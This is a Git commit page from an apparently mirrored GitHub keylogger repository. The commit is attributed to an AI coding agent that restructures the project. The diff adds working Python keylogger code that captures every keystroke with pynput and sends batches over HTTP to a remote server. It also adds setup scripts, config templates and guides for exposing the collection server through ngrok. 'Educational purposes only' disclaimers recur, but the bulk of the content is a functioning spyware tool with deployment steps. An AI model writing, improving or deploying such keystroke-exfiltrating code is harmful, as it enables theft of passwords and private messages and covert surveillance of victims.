0x5t4l1n/Keylogger
1
0
Fork 0
mirror of https://github.com/0x5t4l1n/Keylogger.git synced 2026-05-26 11:35:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Restructure project with organized directories and improved configuration

Browse Source 
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
This commit is contained in:
copilot-swe-agent[bot]
2026-01-22 04:19:59 +00:00
parent a50f6fc38e
commit b0246b4e6f
17 changed files with 1354 additions and 95 deletions
Download Patch File Download Diff File Expand all files Collapse all files
.gitignore
+7
View File
@@ -70,7 +70,14 @@ Thumbs.db
# Log files
*.log
logs/
# ngrok
ngrok
ngrok.exe
ngrok-*.zip
ngrok-*.tgz
# Configuration files with sensitive data
config/config.json
config/.env
README.md
+191 -93
View File
@@ -2,64 +2,148 @@
[![Contributors](https://img.shields.io/github/contributors/Stalin-143/Keylogger?style=for-the-badge)](https://github.com/Stalin-143/Keylogger/graphs/contributors)
![WhatsApp Image 2024-11-29 at 11 35 30 PM](https://github.com/user-attachments/assets/689d466c-26d5-4830-8dba-48693ea04d01)
## Introduction
Welcome to the **Keylogger Project**! This project demonstrates how a keylogger operates. Keyloggers are tools that can record keystrokes made on a computer or device, capturing everything from passwords to personal messages. While they can be used for legitimate purposes, they are also often used by malicious actors for cybercrime.
### How to Use
1. Clone or download the repository.
2. Install the required dependencies.
3. Run the `key_logger.py` script to capture keystrokes.
4. Start the `web_server.py` to view and download the logs from the web interface.
### Requirements
- Python 3.x
- Flask (`pip install flask`)
- Requests (`pip install requests`)
### Usage Instructions
1. Set up the keylogger script:
- Run `key_logger.py` to start capturing keystrokes.
2. Start the Flask web server:
- Run `web_server.py` to launch the web interface for viewing and downloading logs.
⚠️ **IMPORTANT**: This project is for **educational purposes only**. Unauthorized use of keyloggers is illegal and punishable by law.
## 📂 Project Structure
```
/keylogger-project
├── /assets
├── /logs
├── /scripts
│ ├── key_logger.py
── web_server.py
├── /templates
│ └── index.html
├── /config
│ └── config.json
├── README.md
├── LICENSE
── requirements.txt
├── /src # Source code
│ ├── keylogger.py # Main keylogger script
│ └── server.py # Web server for viewing logs
├── /config # Configuration files
── config.json.example # Configuration template
│ └── .env.example # Environment variables template
├── /logs # Log files directory (created automatically)
├── /docs # Documentation
│ └── manual.sh # Educational information script
├── /github # GitHub workflows and configs
├── setup.sh # Setup script
── requirements.txt # Python dependencies
├── README.md # This file
├── LICENSE # License information
├── SECURITY.md # Security policy
├── DISCLAIMER.md # Legal disclaimer
└── CONTRIBUTORS.md # Contributors list
```
## What is a Keylogger?
## 🚀 Quick Start
### Prerequisites
- Python 3.7 or higher
- pip (Python package manager)
- ngrok (for exposing the web server, optional)
### Installation
1. **Clone the repository**
```bash
git clone https://github.com/Stalin-143/Keylogger.git
cd Keylogger
```
2. **Run the setup script**
```bash
./setup.sh
```
This will:
- Check for Python installation
- Optionally create a virtual environment
- Install required dependencies
- Set up configuration files
3. **Configure the application**
Edit `config/config.json`:
```json
{
"keylogger": {
"log_file_path": "logs/keylog.txt",
"batch_size": 10,
"server_url": "https://your-ngrok-url.ngrok-free.app"
},
"web_server": {
"log_file_path": "logs/keylog.txt",
"host": "0.0.0.0",
"port": 5000,
"debug": false
}
}
```
4. **Set up authentication**
Edit `config/.env`:
```bash
WEB_SERVER_USERNAME=admin
WEB_SERVER_PASSWORD=your_secure_password_here
FLASK_DEBUG=False
```
### Usage
#### 1. Start the Web Server
```bash
# Using default configuration
python3 src/server.py
# Using custom configuration
python3 src/server.py --config config/config.json --port 8080
# Load environment variables
source config/.env # or use 'export' for each variable
python3 src/server.py
```
The web server will start and be accessible at `http://localhost:5000` (or your configured port).
#### 2. (Optional) Expose Server with ngrok
If you want to access the server remotely:
```bash
# Install ngrok from https://ngrok.com/download
ngrok http 5000
```
Copy the ngrok URL (e.g., `https://xxxx-xxxx.ngrok-free.app`) and update it in `config/config.json`.
#### 3. Run the Keylogger
```bash
# Using default configuration
python3 src/keylogger.py
# Using custom configuration
python3 src/keylogger.py --config config/config.json
# With command-line overrides
python3 src/keylogger.py --server-url https://your-ngrok-url.ngrok-free.app --log-file logs/custom.txt
```
Press **ESC** to stop the keylogger.
#### 4. View Logs
Open your browser and navigate to:
- Local: `http://localhost:5000`
- Remote: `https://your-ngrok-url.ngrok-free.app`
Login with your configured credentials and view/download the logs.
## 📖 What is a Keylogger?
A **Keylogger** is a software or hardware tool designed to record every keystroke made by a user on a computer or device. It can capture sensitive information such as:
- **Usernames**
- **Passwords**
- **Credit card information**
@@ -67,79 +151,92 @@ A **Keylogger** is a software or hardware tool designed to record every keystrok
Keyloggers are typically used by attackers to steal personal data or spy on users without their knowledge.
## Types of Keyloggers
## 🔍 Types of Keyloggers
There are two main types of keyloggers:
1. **Software Keyloggers**: These run in the background on a computer, recording keystrokes and often sending the data to an attacker remotely.
2. **Hardware Keyloggers**: These are physical devices that are plugged into a computer between the keyboard and the computer. They can capture keystrokes without needing software.
## Why Hackers Use Keyloggers
## 🎯 Why Hackers Use Keyloggers
Hackers use keyloggers for several reasons:
1. **Stealing Personal Information**: Keyloggers can capture sensitive information such as usernames, passwords, and bank details.
2. **Credential Harvesting**: Attackers can use keyloggers to gather login credentials for unauthorized access.
3. **Spyware**: Keyloggers allow hackers to secretly monitor a user's activity without their consent.
4. **Social Engineering**: Keyloggers help attackers gather information to manipulate targets.
5. **Advanced Persistent Threats (APTs)**: Keyloggers are used as part of long-term cyberattacks to monitor and steal sensitive data.
## Keylogger Functionality
Keyloggers work by capturing every keystroke typed on a computer. The data is usually saved to a log file or sent to a remote server. Some keyloggers are highly sophisticated, using encryption and stealth techniques to avoid detection by antivirus programs.
## ⚙️ Keylogger Features
### Keylogger Features:
- **Stealth Mode**: Runs silently in the background without alerting the user.
- **Data Storage**: Logs keystrokes in a local file or sends them remotely to an attacker.
- **Persistence**: Some keyloggers are designed to persist even after a system restart.
- **Key Masking**: They can disguise their presence by masking or renaming files.
- **Configuration Management**: Use JSON config files and environment variables
- **Command-line Interface**: Flexible CLI with argument parsing
- **Batch Processing**: Send logs in batches to reduce network overhead
- **Error Handling**: Robust error handling and logging
- **Web Interface**: View and download logs through a secure web interface
- **Basic Authentication**: Password-protected web interface
## ⚖️ Legal Implications of Keyloggers
## Legal Implications of Keyloggers
Using keyloggers for malicious purposes is **illegal** in most countries. Keyloggers are often used in **cybercrime** and **identity theft**. Here are some of the key laws regarding keyloggers:
- **Computer Fraud and Abuse Act (CFAA)** in the U.S. makes unauthorized access to computer systems illegal.
- **Wiretap Act** criminalizes intercepting communications without consent.
- **General Data Protection Regulation (GDPR)** in Europe requires explicit consent to collect personal data.
- **Cybersecurity Laws** in many countries make hacking, data theft, and unauthorized surveillance punishable by law.
### Consequences of Using Keyloggers Illegally:
- **Imprisonment**: In many jurisdictions, unauthorized use of keyloggers can result in severe criminal charges.
- **Fines**: Convicted individuals may face hefty fines, especially if the data stolen is used for financial gain.
- **Reputational Damage**: Being caught using a keylogger illegally can lead to significant harm to one's reputation.
## Ethical Considerations
## 🛡️ Ethical Considerations
While keyloggers are often associated with malicious hacking, they can have legitimate uses:
1. **Parental Control**: Parents use keyloggers to monitor their children's online activities.
2. **Employee Monitoring**: Employers may monitor their employees to ensure compliance with company policies.
3. **Security Testing**: Ethical hackers use keyloggers as part of penetration testing to identify vulnerabilities.
It is essential that **explicit consent** is obtained before using keyloggers for any purpose. Always ensure compliance with local laws and ethical guidelines.
## Keylogger in Cybersecurity
## 🔐 Keylogger in Cybersecurity
In the realm of **ethical hacking** and **penetration testing**, keyloggers are used to test the security of a system. Ethical hackers might deploy keyloggers as part of a broader security assessment. The goal is to discover vulnerabilities in a system and ensure sensitive data is protected.
### Ethical Use Cases:
- **Penetration Testing**: Keyloggers help identify security weaknesses and prevent future breaches.
- **System Auditing**: Businesses can use keyloggers to monitor user behavior and detect malicious activities.
## Privacy and Security Risks
## 🔒 Privacy and Security Risks
Keyloggers pose significant risks to privacy and security:
- **Privacy Violations**: Keyloggers record everything typed, exposing personal data to unauthorized parties.
- **Identity Theft**: If hackers steal login credentials or other personal information, it can lead to identity theft or financial fraud.
- **Cyberattacks**: Keyloggers can be used as part of larger **phishing** or **malware** attacks.
## Conclusion
While keyloggers have legitimate uses in cybersecurity, they are often abused for malicious purposes, violating privacy and causing significant harm. Always ensure you have the proper authorization and legal basis before using any keylogger. Misuse of keyloggers can result in serious legal consequences.
## 🛠️ Development
### **Legal Disclaimer**
This project is intended for **educational purposes** only. Unauthorized use of keyloggers for malicious activities is illegal and punishable by law. Always obtain explicit consent before deploying monitoring tools and ensure compliance with local and international laws.
### Requirements
## How to Use This Keylogger Project
1. Clone or download the repository.
2. Install the required dependencies.
3. Set up the web server and keylogger script.
4. Customize the configuration for your use case (location of log file, ngrok URL, etc.).
5. **Run the keylogger** responsibly and ensure it is used **ethically**.
- Python 3.7+
- Flask 2.2.5
- pynput 1.7.6
- requests 2.32.4
## Resources
- GitHub Repository: [Resource](https://github.com/Stalin-143)
- Related Articles on Ethical Hacking and Cybersecurity
### Project Structure
## Contributions
The project follows a modular structure:
- `/src` - Contains the main application code
- `/config` - Configuration files and templates
- `/logs` - Log files (auto-created, git-ignored)
- `/docs` - Documentation and educational materials
### Contributing
Contributions are welcome! Please make sure to follow ethical guidelines and legal standards when contributing to this project.
@@ -149,31 +246,32 @@ See our [Contributors Hall of Fame](CONTRIBUTORS.md) to view all the amazing peo
This project is licensed under the [License](LICENSE)
## ⚠️ Legal Disclaimer
This project is intended for **educational purposes** only. Unauthorized use of keyloggers for malicious activities is illegal and punishable by law. Always obtain explicit consent before deploying monitoring tools and ensure compliance with local and international laws.
**Disclaimer**: This project is intended for educational purposes only. Unauthorized use of keyloggers is illegal.
## 🆘 Support
If you encounter any issues or have questions:
1. Check the [SECURITY.md](SECURITY.md) for security-related concerns
2. Read the [DISCLAIMER.md](DISCLAIMER.md) for legal information
3. Open an issue on GitHub
## 📚 Resources
- GitHub Repository: [Stalin-143](https://github.com/Stalin-143)
- Educational Script: Run `./docs/manual.sh` for detailed information
- Related Articles on Ethical Hacking and Cybersecurity
## 💰 Support the Project
You can help by donating:
[![BuyMeACoffee](https://img.shields.io/badge/Buy%20Me%20a%20Coffee-ffdd00?style=for-the-badge&logo=buy-me-a-coffee&logoColor=black)](https://buymeacoffee.com/stalin143) [![PayPal](https://img.shields.io/badge/PayPal-00457C?style=for-the-badge&logo=paypal&logoColor=white)](https://paypal.me/stalinS143)
---
### 💰 You can help me by Donating
[![BuyMeACoffee](https://img.shields.io/badge/Buy%20Me%20a%20Coffee-ffdd00?style=for-the-badge&logo=buy-me-a-coffee&logoColor=black)](https://buymeacoffee.com/stalin143) [![PayPal](https://img.shields.io/badge/PayPal-00457C?style=for-the-badge&logo=paypal&logoColor=white)](https://paypal.me/stalinS143)
**Remember**: Always use this tool responsibly and ethically. Obtain proper authorization before using any monitoring software.
README_OLD.md
+179
View File
@@ -0,0 +1,179 @@
# Keylogger :)
[![Contributors](https://img.shields.io/github/contributors/Stalin-143/Keylogger?style=for-the-badge)](https://github.com/Stalin-143/Keylogger/graphs/contributors)
![WhatsApp Image 2024-11-29 at 11 35 30 PM](https://github.com/user-attachments/assets/689d466c-26d5-4830-8dba-48693ea04d01)
## Introduction
Welcome to the **Keylogger Project**! This project demonstrates how a keylogger operates. Keyloggers are tools that can record keystrokes made on a computer or device, capturing everything from passwords to personal messages. While they can be used for legitimate purposes, they are also often used by malicious actors for cybercrime.
### How to Use
1. Clone or download the repository.
2. Install the required dependencies.
3. Run the `key_logger.py` script to capture keystrokes.
4. Start the `web_server.py` to view and download the logs from the web interface.
### Requirements
- Python 3.x
- Flask (`pip install flask`)
- Requests (`pip install requests`)
### Usage Instructions
1. Set up the keylogger script:
- Run `key_logger.py` to start capturing keystrokes.
2. Start the Flask web server:
- Run `web_server.py` to launch the web interface for viewing and downloading logs.
## 📂 Project Structure
```
/keylogger-project
├── /assets
├── /logs
├── /scripts
│ ├── key_logger.py
│ └── web_server.py
├── /templates
│ └── index.html
├── /config
│ └── config.json
├── README.md
├── LICENSE
└── requirements.txt
```
## What is a Keylogger?
A **Keylogger** is a software or hardware tool designed to record every keystroke made by a user on a computer or device. It can capture sensitive information such as:
- **Usernames**
- **Passwords**
- **Credit card information**
- **Private messages**
Keyloggers are typically used by attackers to steal personal data or spy on users without their knowledge.
## Types of Keyloggers
There are two main types of keyloggers:
1. **Software Keyloggers**: These run in the background on a computer, recording keystrokes and often sending the data to an attacker remotely.
2. **Hardware Keyloggers**: These are physical devices that are plugged into a computer between the keyboard and the computer. They can capture keystrokes without needing software.
## Why Hackers Use Keyloggers
Hackers use keyloggers for several reasons:
1. **Stealing Personal Information**: Keyloggers can capture sensitive information such as usernames, passwords, and bank details.
2. **Credential Harvesting**: Attackers can use keyloggers to gather login credentials for unauthorized access.
3. **Spyware**: Keyloggers allow hackers to secretly monitor a user's activity without their consent.
4. **Social Engineering**: Keyloggers help attackers gather information to manipulate targets.
5. **Advanced Persistent Threats (APTs)**: Keyloggers are used as part of long-term cyberattacks to monitor and steal sensitive data.
## Keylogger Functionality
Keyloggers work by capturing every keystroke typed on a computer. The data is usually saved to a log file or sent to a remote server. Some keyloggers are highly sophisticated, using encryption and stealth techniques to avoid detection by antivirus programs.
### Keylogger Features:
- **Stealth Mode**: Runs silently in the background without alerting the user.
- **Data Storage**: Logs keystrokes in a local file or sends them remotely to an attacker.
- **Persistence**: Some keyloggers are designed to persist even after a system restart.
- **Key Masking**: They can disguise their presence by masking or renaming files.
## Legal Implications of Keyloggers
Using keyloggers for malicious purposes is **illegal** in most countries. Keyloggers are often used in **cybercrime** and **identity theft**. Here are some of the key laws regarding keyloggers:
- **Computer Fraud and Abuse Act (CFAA)** in the U.S. makes unauthorized access to computer systems illegal.
- **Wiretap Act** criminalizes intercepting communications without consent.
- **General Data Protection Regulation (GDPR)** in Europe requires explicit consent to collect personal data.
- **Cybersecurity Laws** in many countries make hacking, data theft, and unauthorized surveillance punishable by law.
### Consequences of Using Keyloggers Illegally:
- **Imprisonment**: In many jurisdictions, unauthorized use of keyloggers can result in severe criminal charges.
- **Fines**: Convicted individuals may face hefty fines, especially if the data stolen is used for financial gain.
- **Reputational Damage**: Being caught using a keylogger illegally can lead to significant harm to one's reputation.
## Ethical Considerations
While keyloggers are often associated with malicious hacking, they can have legitimate uses:
1. **Parental Control**: Parents use keyloggers to monitor their children's online activities.
2. **Employee Monitoring**: Employers may monitor their employees to ensure compliance with company policies.
3. **Security Testing**: Ethical hackers use keyloggers as part of penetration testing to identify vulnerabilities.
It is essential that **explicit consent** is obtained before using keyloggers for any purpose. Always ensure compliance with local laws and ethical guidelines.
## Keylogger in Cybersecurity
In the realm of **ethical hacking** and **penetration testing**, keyloggers are used to test the security of a system. Ethical hackers might deploy keyloggers as part of a broader security assessment. The goal is to discover vulnerabilities in a system and ensure sensitive data is protected.
### Ethical Use Cases:
- **Penetration Testing**: Keyloggers help identify security weaknesses and prevent future breaches.
- **System Auditing**: Businesses can use keyloggers to monitor user behavior and detect malicious activities.
## Privacy and Security Risks
Keyloggers pose significant risks to privacy and security:
- **Privacy Violations**: Keyloggers record everything typed, exposing personal data to unauthorized parties.
- **Identity Theft**: If hackers steal login credentials or other personal information, it can lead to identity theft or financial fraud.
- **Cyberattacks**: Keyloggers can be used as part of larger **phishing** or **malware** attacks.
## Conclusion
While keyloggers have legitimate uses in cybersecurity, they are often abused for malicious purposes, violating privacy and causing significant harm. Always ensure you have the proper authorization and legal basis before using any keylogger. Misuse of keyloggers can result in serious legal consequences.
### **Legal Disclaimer**
This project is intended for **educational purposes** only. Unauthorized use of keyloggers for malicious activities is illegal and punishable by law. Always obtain explicit consent before deploying monitoring tools and ensure compliance with local and international laws.
## How to Use This Keylogger Project
1. Clone or download the repository.
2. Install the required dependencies.
3. Set up the web server and keylogger script.
4. Customize the configuration for your use case (location of log file, ngrok URL, etc.).
5. **Run the keylogger** responsibly and ensure it is used **ethically**.
## Resources
- GitHub Repository: [Resource](https://github.com/Stalin-143)
- Related Articles on Ethical Hacking and Cybersecurity
## Contributions
Contributions are welcome! Please make sure to follow ethical guidelines and legal standards when contributing to this project.
See our [Contributors Hall of Fame](CONTRIBUTORS.md) to view all the amazing people who have contributed to this project! ✨
## 📜 License
This project is licensed under the [License](LICENSE)
**Disclaimer**: This project is intended for educational purposes only. Unauthorized use of keyloggers is illegal.
---
### 💰 You can help me by Donating
[![BuyMeACoffee](https://img.shields.io/badge/Buy%20Me%20a%20Coffee-ffdd00?style=for-the-badge&logo=buy-me-a-coffee&logoColor=black)](https://buymeacoffee.com/stalin143) [![PayPal](https://img.shields.io/badge/PayPal-00457C?style=for-the-badge&logo=paypal&logoColor=white)](https://paypal.me/stalinS143)
config/.env.example
+6
View File
@@ -0,0 +1,6 @@
# Web Server Authentication
WEB_SERVER_USERNAME=admin
WEB_SERVER_PASSWORD=change_this_password
# Flask Configuration
FLASK_DEBUG=False
config/config.json.example
+13
View File
@@ -0,0 +1,13 @@
{
"keylogger": {
"log_file_path": "logs/keylog.txt",
"batch_size": 10,
"server_url": "https://your-ngrok-url.ngrok-free.app"
},
"web_server": {
"log_file_path": "logs/keylog.txt",
"host": "0.0.0.0",
"port": 5000,
"debug": false
}
}
docs/INSTALLATION.md
+336
View File
@@ -0,0 +1,336 @@
# Installation and Setup Guide
## Table of Contents
1. [Prerequisites](#prerequisites)
2. [Installation](#installation)
3. [Configuration](#configuration)
4. [Running the Application](#running-the-application)
5. [Troubleshooting](#troubleshooting)
## Prerequisites
Before you begin, ensure you have the following installed:
- **Python 3.7 or higher**
- Check: `python3 --version`
- Download: https://www.python.org/downloads/
- **pip** (usually comes with Python)
- Check: `pip3 --version`
- **git** (for cloning the repository)
- Check: `git --version`
- Download: https://git-scm.com/downloads
## Installation
### Step 1: Clone the Repository
```bash
git clone https://github.com/Stalin-143/Keylogger.git
cd Keylogger
```
### Step 2: Run Setup Script (Recommended)
```bash
chmod +x setup.sh
./setup.sh
```
The setup script will:
- Check for Python installation
- Create a virtual environment (optional)
- Install dependencies
- Set up configuration files
### Step 3: Manual Installation (Alternative)
If you prefer manual installation:
```bash
# Create virtual environment (recommended)
python3 -m venv venv
# Activate virtual environment
# On Linux/Mac:
source venv/bin/activate
# On Windows:
venv\Scripts\activate
# Install dependencies
pip install -r requirements.txt
# Copy configuration templates
cp config/config.json.example config/config.json
cp config/.env.example config/.env
# Create logs directory
mkdir -p logs
```
## Configuration
### 1. Edit config/config.json
```json
{
"keylogger": {
"log_file_path": "logs/keylog.txt",
"batch_size": 10,
"server_url": "https://your-ngrok-url.ngrok-free.app"
},
"web_server": {
"log_file_path": "logs/keylog.txt",
"host": "0.0.0.0",
"port": 5000,
"debug": false
}
}
```
**Configuration Options:**
- `keylogger.log_file_path`: Path where keystrokes will be logged
- `keylogger.batch_size`: Number of keystrokes before sending to server
- `keylogger.server_url`: URL of the web server (use ngrok URL if remote)
- `web_server.log_file_path`: Path to read logs from
- `web_server.host`: Host to bind server to (0.0.0.0 for all interfaces)
- `web_server.port`: Port to bind server to
- `web_server.debug`: Enable Flask debug mode (set to false in production)
### 2. Edit config/.env
```bash
# Web Server Authentication
WEB_SERVER_USERNAME=admin
WEB_SERVER_PASSWORD=your_secure_password_here
# Flask Configuration
FLASK_DEBUG=False
```
**Important:** Change the default password to a secure one!
### 3. Set Environment Variables (Before Running)
```bash
# On Linux/Mac:
export $(cat config/.env | xargs)
# Or source it:
source config/.env
# On Windows (PowerShell):
Get-Content config/.env | ForEach-Object {
$name, $value = $_.split('=')
Set-Content env:\$name $value
}
```
## Running the Application
### Running the Web Server
**Basic usage:**
```bash
python3 src/server.py
```
**With custom configuration:**
```bash
python3 src/server.py --config config/config.json
```
**With command-line options:**
```bash
python3 src/server.py --port 8080 --debug
```
**All options:**
- `--config PATH`: Path to config file (default: config/config.json)
- `--log-file PATH`: Override log file path
- `--host HOST`: Host to bind to (default: 0.0.0.0)
- `--port PORT`: Port to bind to (default: 5000)
- `--debug`: Enable debug mode
### Exposing Server with ngrok (Optional)
If you want to access the server remotely:
1. **Download ngrok:**
- Visit: https://ngrok.com/download
- Or use package manager:
```bash
# Linux (snap)
snap install ngrok
# Mac (homebrew)
brew install ngrok/ngrok/ngrok
```
2. **Run ngrok:**
```bash
ngrok http 5000
```
3. **Copy the URL:**
```
Forwarding https://xxxx-xxxx-xxxx.ngrok-free.app -> http://localhost:5000
```
4. **Update config.json:**
- Replace `server_url` with the ngrok URL
### Running the Keylogger
**Basic usage:**
```bash
python3 src/keylogger.py
```
**With custom configuration:**
```bash
python3 src/keylogger.py --config config/config.json
```
**With command-line options:**
```bash
python3 src/keylogger.py --server-url https://your-url.ngrok-free.app --batch-size 20
```
**All options:**
- `--config PATH`: Path to config file (default: config/config.json)
- `--log-file PATH`: Override log file path
- `--server-url URL`: Override server URL
- `--batch-size N`: Override batch size
**Stopping the keylogger:**
- Press **ESC** key to stop
### Accessing the Web Interface
1. **Open browser:**
- Local: http://localhost:5000
- Remote: https://your-ngrok-url.ngrok-free.app
2. **Login:**
- Username: (from config/.env)
- Password: (from config/.env)
3. **View/Download logs:**
- View logs in the browser
- Click "Download Log File" to download
## Troubleshooting
### Common Issues
#### 1. "Config file not found"
```
Error: Config file not found at config/config.json
```
**Solution:**
```bash
cp config/config.json.example config/config.json
# Then edit config/config.json with your settings
```
#### 2. "Permission denied" when creating log directory
```
PermissionError: [Errno 13] Permission denied
```
**Solution:**
- Use a different log path with write permissions
- Or run with appropriate permissions
- Or use logs/ directory in the project folder
#### 3. "Module not found" errors
```
ModuleNotFoundError: No module named 'flask'
```
**Solution:**
```bash
pip install -r requirements.txt
```
#### 4. "Connection refused" when keylogger tries to send logs
```
Error sending log: Connection refused
```
**Solution:**
- Ensure the web server is running
- Check that the server URL in config.json is correct
- If using ngrok, ensure it's running and URL is updated
#### 5. Authentication not working
```
Unauthorized Access
```
**Solution:**
- Check that environment variables are set:
```bash
echo $WEB_SERVER_USERNAME
echo $WEB_SERVER_PASSWORD
```
- Re-export environment variables:
```bash
source config/.env
```
#### 6. Port already in use
```
OSError: [Errno 48] Address already in use
```
**Solution:**
- Use a different port:
```bash
python3 src/server.py --port 8080
```
- Or kill the process using the port:
```bash
lsof -ti:5000 | xargs kill -9
```
### Getting Help
If you encounter issues not covered here:
1. Check the [README.md](../README.md)
2. Review [SECURITY.md](../SECURITY.md) for security concerns
3. Open an issue on GitHub
## Best Practices
1. **Always use a virtual environment** to avoid dependency conflicts
2. **Never commit config/config.json or config/.env** (they're in .gitignore)
3. **Use strong passwords** for web authentication
4. **Keep your server URL private** if using sensitive logs
5. **Only use on systems you own or have explicit permission to monitor**
## Legal Notice
⚠️ **This tool is for educational purposes only.**
- Always obtain explicit written consent before monitoring any system
- Unauthorized use is illegal and punishable by law
- Comply with all local, state, and federal laws
- Use responsibly and ethically
## Next Steps
After setup:
1. Read the full [README.md](../README.md)
2. Review [DISCLAIMER.md](../DISCLAIMER.md)
3. Run `./docs/manual.sh` for educational information
4. Start with local testing before deploying remotely
---
For more information, visit: https://github.com/Stalin-143/Keylogger
manual.sh → docs/manual.sh
View File
ngrok-v3-stable-darwin-arm64.zip
BIN
View File
Binary file not shown.
ngrok-v3-stable-freebsd-amd64.tgz
BIN
View File
Binary file not shown.
ngrok-v3-stable-linux-amd64.tgz
BIN
View File
Binary file not shown.
ngrok-v3-stable-linux-arm64.tgz
BIN
View File
Binary file not shown.
ngrok-v3-stable-windows-amd64.zip
BIN
View File
Binary file not shown.
requirements.txt
+1
View File
@@ -1,3 +1,4 @@
pynput==1.7.6
Flask==2.2.5
requests==2.32.4
python-dotenv==1.0.0
setup.sh
Executable
+97
View File
@@ -0,0 +1,97 @@
#!/bin/bash
# Setup script for Keylogger Project
# For educational purposes only
echo "=========================================="
echo " Keylogger Project Setup"
echo "=========================================="
echo ""
# Check if Python 3 is installed
if ! command -v python3 &> /dev/null; then
echo "Error: Python 3 is not installed."
echo "Please install Python 3 and try again."
exit 1
fi
echo "✓ Python 3 found: $(python3 --version)"
echo ""
# Create virtual environment (optional but recommended)
read -p "Create a virtual environment? (recommended) [Y/n]: " create_venv
create_venv=${create_venv:-Y}
if [[ $create_venv =~ ^[Yy]$ ]]; then
echo "Creating virtual environment..."
python3 -m venv venv
if [ $? -eq 0 ]; then
echo "✓ Virtual environment created"
echo ""
echo "To activate the virtual environment, run:"
echo " source venv/bin/activate (Linux/Mac)"
echo " venv\\Scripts\\activate (Windows)"
echo ""
# Activate virtual environment
source venv/bin/activate 2>/dev/null || . venv/bin/activate
else
echo "Warning: Failed to create virtual environment"
fi
fi
# Install dependencies
echo "Installing dependencies..."
pip install -r requirements.txt
if [ $? -eq 0 ]; then
echo "✓ Dependencies installed successfully"
else
echo "Error: Failed to install dependencies"
exit 1
fi
echo ""
# Setup configuration files
echo "Setting up configuration files..."
if [ ! -f "config/config.json" ]; then
cp config/config.json.example config/config.json
echo "✓ Created config/config.json from example"
echo " Please edit config/config.json with your settings"
else
echo "✓ config/config.json already exists"
fi
if [ ! -f "config/.env" ]; then
cp config/.env.example config/.env
echo "✓ Created config/.env from example"
echo " Please edit config/.env with your credentials"
else
echo "✓ config/.env already exists"
fi
echo ""
# Create logs directory if it doesn't exist
mkdir -p logs
echo "✓ Logs directory ready"
echo ""
echo "=========================================="
echo " Setup Complete!"
echo "=========================================="
echo ""
echo "Next steps:"
echo "1. Edit config/config.json with your server URL and settings"
echo "2. Edit config/.env with secure credentials (change default password!)"
echo "3. Run the web server: python3 src/server.py"
echo "4. Run the keylogger: python3 src/keylogger.py"
echo ""
echo "For more information, see README.md"
echo ""
echo "⚠️ IMPORTANT: This tool is for educational purposes only."
echo " Always obtain explicit consent before monitoring."
echo ""
src/__init__.py
+10
View File
@@ -0,0 +1,10 @@
"""
Keylogger Package
Educational keylogging tools for security awareness.
For educational purposes only.
"""
__version__ = '0.2.0'
__author__ = 'Stalin-143'
__license__ = 'See LICENSE file'
src/keylogger.py
+212
View File
@@ -0,0 +1,212 @@
"""
Keylogger Module
Captures keyboard input and sends it to a remote server.
For educational purposes only.
"""
import logging
import os
import sys
import json
import argparse
from pynput.keyboard import Listener, Key
import requests
import time
# ASCII Art Banner
BANNER = r"""
_ __ _
| |/ /___ _ _ | | ___ __ _ __ _ ___ _ __
| ' // _ \ | | | | | / _ \ / _` |/ _` |/ _ \ '__|
| . \ __/ |_| | | |__| (_) | (_| | (_| | __/ |
|_|\_\___|\__, | |_____\___/ \__, |\__, |\___|_|
|___/ |___/ |___/
0.2
GitHub: https://github.com/Stalin-143
"""
class KeyLogger:
"""Keylogger class to handle keyboard input capture and logging."""
def __init__(self, log_file_path, server_url, batch_size=10):
"""
Initialize the KeyLogger.
Args:
log_file_path (str): Path to the log file
server_url (str): URL of the server to send logs to
batch_size (int): Number of keystrokes before sending to server
"""
self.log_file_path = log_file_path
self.server_url = server_url
self.batch_size = batch_size
self.buffer = []
# Ensure the log directory exists
log_dir = os.path.dirname(self.log_file_path)
if log_dir and not os.path.exists(log_dir):
try:
os.makedirs(log_dir, exist_ok=True)
except PermissionError as e:
print(f"PermissionError: {e}")
print("Please ensure you have permission to write to the specified path.")
sys.exit(1)
# Configure logging
logging.basicConfig(
filename=self.log_file_path,
level=logging.DEBUG,
format="%(asctime)s: %(message)s"
)
def send_log_to_server(self):
"""Send buffered log data to the web server."""
if not self.buffer:
return
try:
log_data = ''.join(self.buffer)
response = requests.post(self.server_url, data={"log": log_data}, timeout=10)
if response.status_code == 200:
print("Log sent successfully!")
else:
print(f"Failed to send log. Server responded with status: {response.status_code}")
# Clear the buffer after sending
self.buffer = []
except requests.exceptions.RequestException as e:
print(f"Error sending log: {e}")
def on_press(self, key):
"""
Handle key press events.
Args:
key: The key that was pressed
"""
try:
# Capture the key press and format it
if hasattr(key, 'char') and key.char is not None:
key_str = f"Key pressed: {key.char}"
else:
# Handle special keys
key_str = f"Special key pressed: {key}"
# Log the key
logging.info(key_str)
self.buffer.append(key_str + "\n")
# If buffer reaches batch size, send the log
if len(self.buffer) >= self.batch_size:
self.send_log_to_server()
except Exception as e:
print(f"Error logging key: {e}")
def on_release(self, key):
"""
Handle key release events.
Args:
key: The key that was released
Returns:
False to stop the listener when ESC is pressed
"""
# Stop listener when 'esc' is pressed
if key == Key.esc:
return False
def start(self):
"""Start the keylogger."""
print(BANNER)
print("Keylogger started. Press ESC to stop.")
print(f"Logging to: {self.log_file_path}")
print(f"Server URL: {self.server_url}")
print("-" * 50)
# Start listening for keyboard events
with Listener(on_press=self.on_press, on_release=self.on_release) as listener:
listener.join()
# Send any remaining logs when the listener stops
self.send_log_to_server()
print("\nKeylogger stopped.")
def load_config(config_path):
"""
Load configuration from JSON file.
Args:
config_path (str): Path to the config file
Returns:
dict: Configuration dictionary
"""
try:
with open(config_path, 'r') as f:
return json.load(f)
except FileNotFoundError:
print(f"Error: Config file not found at {config_path}")
print("Please copy config/config.json.example to config/config.json and configure it.")
sys.exit(1)
except json.JSONDecodeError as e:
print(f"Error: Invalid JSON in config file: {e}")
sys.exit(1)
def main():
"""Main function to run the keylogger."""
parser = argparse.ArgumentParser(
description='Keylogger - For educational purposes only',
epilog='Always obtain explicit consent before using monitoring tools.'
)
parser.add_argument(
'--config',
default='config/config.json',
help='Path to configuration file (default: config/config.json)'
)
parser.add_argument(
'--log-file',
help='Override log file path from config'
)
parser.add_argument(
'--server-url',
help='Override server URL from config'
)
parser.add_argument(
'--batch-size',
type=int,
help='Override batch size from config'
)
args = parser.parse_args()
# Load configuration
config = load_config(args.config)
keylogger_config = config.get('keylogger', {})
# Override with command-line arguments if provided
